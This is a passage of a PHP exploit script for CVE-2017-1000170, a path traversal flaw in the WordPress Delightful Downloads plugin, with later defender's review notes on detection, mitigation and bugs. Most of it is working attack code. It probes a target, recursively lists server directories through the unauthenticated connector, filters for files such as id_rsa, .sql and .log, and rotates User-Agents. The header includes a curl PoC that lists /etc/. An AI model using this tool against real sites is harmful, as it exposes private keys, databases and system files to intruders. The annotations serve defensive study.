# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: <=1.6.6
# Tested on: Debian 11
# CVE : CVE-2017-1000170
# PHP version (exploit): 7.3.27
# POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
#
# Review notes (defender's reading of this PoC):
# - Issue: the jqueryFileTree connector shipped under the plugin's assets path takes a POST
#   `dir` parameter and answers with a listing of that directory; the request in the POC line
#   carries no credentials, which is why the banner below calls this "Unauthenticated".
# - Detection: POST requests to .../assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php,
#   especially with a `dir` value outside the site's document root. The request pattern of this
#   script is itself a signature: a HEAD to that path (is_vulnerable), then a POST with dir=/,
#   then one POST per sub-folder when run with -r (list_files). Positive responses contain
#   "jqueryfiletree" markup with rel="..." attributes, which parse_dir extracts.
# - Mitigation: update the plugin (this header lists <=1.6.6 as affected) and/or deny access to
#   the connector script at the web-server level. Whether later releases still ship the
#   connector is not shown here - TODO confirm against the vendor repository.
#
# NOTE: the file is truncated before this point. The head of post_request() (its signature and
# the curl options preceding the fragment below), the $agents list and $vuln_file (the path of
# the connector relative to the target URL - presumably the path in the POC line) are not
# visible; every use of them below is an assumption to confirm against the full file.
$data));
#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp
    // Optional random User-Agent, picked from the (not visible) $agents list with rand().
    if($random_agent){
        curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
    }
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

// Extracts every rel="..." attribute value from the connector's HTML response.
// Entries ending in "/" are treated as folders by list_files (see its "#^\/.*\/$#" test).
// @param string $str  raw response body returned by post_request()
// @return string[]    the rel values in document order; empty array when there are none
function parse_dir($str){ // by raina77ow =)
    $contents = array();
    $startFrom = $contentStart = $contentEnd = 0;
    while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
        $contentStart += 5; // skip the 'rel="' prefix itself
        $contentEnd = strpos($str, '">', $contentStart);
        if (false === $contentEnd){
            break; // unterminated attribute: stop instead of reading to the end of the body
        }
        $contents[] = substr($str, $contentStart, $contentEnd - $contentStart);
        $startFrom = $contentEnd + 2; // resume after the closing '">'
    }
    return $contents;
}

// Prints the listing of $path on the target, one entry per line, descending into
// sub-folders when recursion is on and restricting output to $filter substrings when given.
// Note: `global $recursive;` rebinds the $recursive parameter to the global of the same
// name, so the value passed by callers is ignored and the command-line flag always wins.
// Note: inside the filter loop a match prints the entry and moves on to the NEXT filter,
// so an entry that matches several filters is printed once per match.
// @param string   $url        target base URL; $vuln_file is appended to it
// @param string   $path       directory requested from the connector (expected "/.../" form);
//                             presumably sent as the `dir` POST field - post_request's head is not visible
// @param int      $recursive  ignored in practice, see note above
// @param string[] $filter     substrings matched against each entry name; empty = print everything
function list_files($url,$path, $recursive=0,$filter){
    global $vuln_file;
    global $recursive;
    global $random_agent;
    $exts = "";       // unused
    $extensions = ""; // unused
    $files = "";      // unused
    (count($filter) > 0) ? $has_filter = 1 : $has_filter = 0;
    $parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree
    foreach($parsed as $file_or_folder){
        if($has_filter){
            foreach($filter as $filtered){
                if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter
                    echo " ".$file_or_folder."\n";
                    continue; // next filter (not next entry)
                }
                if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
                    if($recursive){ //if recursive flag is set, enter on each folder and do it
                        list_files($url, $file_or_folder, $recursive, $filter);
                    }
                    continue 2; // continue the outermost foreach
                }
            }
            continue; // if has filter, always restart the loop here
        }
        if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
            if($recursive){ //if recursive flag is set, enter on each folder and do it
                list_files($url, $file_or_folder, $recursive, $filter);
            }else{
                echo " ".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name
            }
        }else{ //is a file
            echo " ".$file_or_folder."\n";
        }
        continue;
    }
}

// Wrapper around list_files: when a recursive scan from "/" is requested it first asks for
// confirmation on stdin (the warning text explains why), aborting the process on anything but Y.
// Note: on abort the script exits before fclose(); the handle is released with the process.
// @param string   $target     target base URL
// @param string   $path       start directory, already normalised to "/.../" form
// @param int      $recursive  1 when -r / --recursive was given
// @param string[] $filter     see list_files
function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain
    if($path == "/" && $recursive == 1){
        echo red(" [i] WARNING: Scanning the root of the webserver recursivelly can exceed the timeout limit, block your IP or even take down the server. Are you sure you want to continue? [y/N] ");
        $handle = fopen ("php://stdin","r");
        $line = fgets($handle);
        if(trim(strtoupper($line)) != 'Y'){
            echo "\n Aborted. 
Try running me without the recursion flag\n\n";
            exit;
        }
        fclose($handle);
        echo cyan("\n\n Ok, don't say I didn't warn you...\n");
    }
    list_files($target,$path, $recursive, $filter);
}

############################################################
// ANSI colour helpers: wrap $str in a bright SGR colour code and reset the attributes after it.
function green($str){ return "\e[92m".$str."\e[0m"; }
function red($str){ return "\e[91m".$str."\e[0m"; }
function yellow($str){ return "\e[93m".$str."\e[0m"; }
function cyan($str){ return "\e[96m".$str."\e[0m"; }

// Prints the ASCII-art banner and returns nothing, so `banner()." Usage..."` further down
// concatenates null (an empty string). The art is reproduced as extracted: its whitespace
// appears collapsed and one character ("ยด") looks mis-encoded; the literal is left untouched.
function banner(){
    echo " _____ _ _ _ _ __ _ _______ | __ \ | (_) | | | | / _| | |__ __| | | | | ___| |_ __ _| |__ | |_| |_ _ _| | | |_ __ ___ ___ | | | |/ _ \ | |/ _` | _ \| __| _| | | | | | | ยด__/ _ \/ _ \ | |__| | __/ | | (_| | | | | |_| | | |_| | | | | | | __/ __/ |_____/ \___|_|_|\__, |_| |_|\__|_| \__,_|_| |_|_| \___|\___| __/ | ".green("Coder: ").yellow("Nicholas Ferreira")." |___/ 0x7359 ".cyan("Delightful Downloads - Jquery File Tree")." Unauthenticated Path Traversal exploit ". red("\n (CVE-2017-1000170)")." ";
}

// ======================= CHECKING =======================
// Command-line parsing. Short and long forms are declared in parallel; "::" marks flags
// that take no value (h, r, a), ":" marks options that require one (u, p, f).
$short_args = "u:h::p:r::f:a::";
$long_args = array("url:","help::","path:","recursive::","filter:","random-agent::");
$options = getopt($short_args, $long_args);
// No arguments at all: banner plus short usage. (The usage text says [-x extensions],
// but the option actually declared above is -f / --filter.)
if($argc == 1){
    die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]\n\n Help: -h or --help\n\n");
}
if(isset($options['h']) || isset($options['help'])){
    banner();
    die( " Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a] -h, --help: Show this message -u, --url: URL of target -a, --random-agent: Use random user agents -f, --filter: Name of files or extensions to search for (separated by comma) -p, --path: The full path from which the filenames will be read (default: /) -r, --recursive: Generates the tree recursivelly (be careful) e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")." 
| \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths (You must provide the dot to indicate it's an extension) ".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")." | \-> This will search for all files named \"id_rsa\" or having the extension \".log\" within all folders of the server, with random user-agents ".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")." ");
}
// -a / --random-agent: 1 enables the User-Agent rotation in post_request().
$random_agent = 0;
if(isset($options['a'])){
    $random_agent = 1;
}elseif(isset($options['random-agent'])){
    $random_agent = 1;
}
// -u / --url: base URL; note that nothing below checks it was actually supplied,
// so an empty $target makes is_vulnerable() request $vuln_file as a bare path.
$target = "";
if(isset($options['u'])){
    $target = $options['u'];
}elseif(isset($options['url'])){
    $target = $options['url'];
}
// -r / --recursive: also read by list_files through `global $recursive`.
$recursive = 0;
if(isset($options['r'])){
    $recursive = 1;
}elseif(isset($options['recursive'])){
    $recursive = 1;
}
// -p / --path: start directory, default "/".
// Bug: the --path branch reads $options['p'] instead of $options['path'], so the long form
// yields null here and the normalisation below turns it back into "/".
$path = "/";
if(isset($options['p'])){
    $path = $options['p'];
}elseif(isset($options['path'])){
    $path = $options['p'];
}
if($path !== "/"){
    if(!preg_match("#^\/.*\/$#", $path)){
        $path = str_replace("//", "/", "/".$path."/"); // $path must be of the form "/.../" (leading and trailing slash) for this to work, so lets force it
    }
}
// -f / --filter: comma-separated substrings; split into $filter, empty array when absent.
$extensions = "";
if(isset($options['f'])){
    $extensions = $options['f']; //strings
}elseif(isset($options['filter'])){
    $extensions = $options['filter']; //string
}
$filter = array();
if($extensions !== ""){
    $filter = explode(",", $extensions);
}
// ========================= END CHECKING ==========================

// Vulnerability probe. Step 1: HEAD request to $url.$vuln_file and keep only the status code.
// Step 2 (on 2xx): POST for "/" and look for "jqueryfiletree" followed by a typical top-level
// OS directory name in the lower-cased body. Prints progress to stdout as it goes.
// @param string $url  target base URL
// @return bool        true only when both steps succeed
function is_vulnerable($url){
    global $vuln_file;
    global $random_agent;
    global $filter;
    echo " [*] Target: ".$url."\n";
    if(count($filter) > 0){
        echo " [*] Filter: ".implode(", ", $filter)."\n\n";
    }
    echo cyan(" [i] Checking if the target is vulnerable...\n");
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
    curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
    curl_exec($ch); // return value ignored; only the status code below is used
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if(substr($code,0,1) == 2){ // 2xx
        echo yellow(" [i] HTTP response of vulnerable file is 
2xx. May be vulnerable!\n");
        $post = post_request($url.$vuln_file, "/", $random_agent);
        // A 2xx alone is not conclusive (the file may exist but not list anything); the
        // body must look like a jqueryFileTree listing of a root directory.
        if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){
            echo green(" [+] Target is vulnerable! Getting file list...\n\n");
            return true;
        }
        echo red(" [-] Target is not vulnerable... =(\n\n");
    }else{
        echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist, you don't have permission to read it or it is in another directory.\n");
    }
    return false;
}

// Main flow: banner, probe, then the (possibly confirmed) listing.
banner();
if(is_vulnerable($target)){
    global $filter; // no-op at file scope: $filter already is the global here
    alert_user($target,$path, $recursive, $filter);
    echo green("\n [+] Done!\n\n");
}
?>